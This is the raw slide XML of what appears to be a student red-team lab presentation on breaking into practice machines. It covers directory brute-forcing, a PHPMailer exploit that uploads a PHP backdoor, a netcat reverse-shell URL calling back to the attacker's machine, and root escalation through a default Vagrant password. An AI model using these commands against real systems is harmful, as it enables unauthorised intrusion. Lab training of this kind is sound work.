                <a:sym typeface="Courier New"/>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>http://192.168.1.115/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="203" name="Google Shape;203;p33"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1538025" y="2251950"/>
            <a:ext cx="5943600" cy="2705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Skimming thru the DB using HTTP</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="209" name="Google Shape;209;p3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With the addresses</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>r directories</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>provided by Nikto</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>and GoBuster,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>We have confirmed</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>that we have </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>successfully gained</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>access in the DB</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>using HTTP on</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>the browser.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="210" name="Google Shape;210;p34"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3155675" y="1772188"/>
            <a:ext cx="5943600" cy="284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Service Used(?)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="216" name="Google Shape;216;p3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By reading through the files, we</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Determined it uses the PHPMailer</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Service, and used an exploit to</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Upload a backdoor script.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Skimming through the files,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>We determined which Requests</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>can be ran from the attacking</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>machine.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="217" name="Google Shape;217;p35"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5101375" y="75000"/>
            <a:ext cx="3870650" cy="4978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Skimming through for flag 1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="223" name="Google Shape;223;p3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Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Navigating to http://192.168.1.115/vendor/PATH reveals a flag1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="224" name="Google Shape;224;p36"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1823850" y="2219550"/>
            <a:ext cx="5943600" cy="1943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Backdoor scripting using PHP Request</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="230" name="Google Shape;230;p3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Running this script on</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1500"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t>The attacking kali</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1500"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t>machine, uploads a </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1500"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t>reverse shell</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1500"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t>script and establishes</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1500"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t>connection in</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1500"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t>conjunction with</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1500"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1500" u="sng"/>
              <a:t>N</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500" u="sng"/>
              <a:t>etcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t> to the attack</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1500"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t>machine.</a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="231" name="Google Shape;231;p37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311688" y="4054650"/>
            <a:ext cx="5381625" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="232" name="Google Shape;232;p37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6035250" y="4054650"/>
            <a:ext cx="31665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&lt;- This confirms it has been uploaded and where to execute it.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Source Code Pro"/>
              <a:ea typeface="Source Code Pro"/>
              <a:cs typeface="Source Code Pro"/>
              <a:sym typeface="Source Code Pro"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="233" name="Google Shape;233;p37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3038175" y="1023012"/>
            <a:ext cx="5919250" cy="2976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Checking if the PHP request went through</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="239" name="Google Shape;239;p3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oboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Using the Browser: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>http://192.168.1.115?backdoor.php?cmd=nc%20192.168.1.90%204444%20-e%20/bin/bash</a:t>
            </a:r>
            <a:endParaRPr sz="1100" u="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="240" name="Google Shape;240;p38"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1460250" y="1996250"/>
            <a:ext cx="5943600" cy="279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0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Exploitation Process</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>: Root Escalation</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="246" name="Google Shape;246;p3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By using the PTY shell exploit(from Target1)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1300"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1300" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>python -c 'import pty;pty.spawn("/bin/bash")'</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1300"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>on the netcat listener, we were able </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1300"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>to spawn a shell as www-data, and </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1300"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>escalate to root using the services (Looking </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1300"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>through “etc/passwd” - write is restricted to root</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1300"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>or superusers, but readable by limited users).</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1300"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>running(Vagrant) using default </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1300"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>password(tnargav). Having root,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1300"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>We have captured all the flags.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1300"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>-Screenshots shows</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1300"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>Locations for flags 2,3 &amp; 4.</a:t>
            </a:r>
            <a:endParaRPr sz="1300"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="247" name="Google Shape;247;p39"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="4446300"/>
            <a:ext cx="5229950" cy="533675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="248" name="Google Shape;248;p39"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4282325" y="3254850"/>
            <a:ext cx="1085850" cy="790575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="249" name="Google Shape;249;p39"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5802936" y="44225"/>
            <a:ext cx="3567478" cy="5143499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="250" name="Google Shape;250;p39"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="1218072">
            <a:off x="8051193" y="3514237"/>
            <a:ext cx="883414" cy="883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That concludes Red Team’s Presentation!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l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="4200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Red Team: </a:t>
            </a:r>
            <a:endParaRPr sz="4200">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="4200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Summary of Operations</a:t>
            </a:r>
            <a:endParaRPr sz="8200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77" name="Google Shape;77;p1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Walkthrough of Breaking-into the machines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490250" y="528900"/>
            <a:ext cx="82182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rPr>
              <a:t>Red Team: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Table of Contents:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>-Exposed Vulnerabilities</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>-Critical Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>-Exploitation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0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scan the network to identify the IP addresses</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="88" name="Google Shape;88;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1466850"/>
            <a:ext cx="8520600" cy="330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FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Before we ran scans, we set up</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Following Alerts in Kibana -</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="0000FF"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Excessive HTTP Errors</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="0000FF"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP Request Size Monitors</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="0000FF"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CPU Usage Monitor</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t># Ping Sweep w/ NMap</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>For hosts discovery</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>COMMAND: nmap -sP</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="89" name="Google Shape;89;p17"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3690225" y="1466850"/>
            <a:ext cx="5247976" cy="312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313775"/>
            <a:ext cx="8520600" cy="1742400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Exposed Services </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>(Target 1) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200">
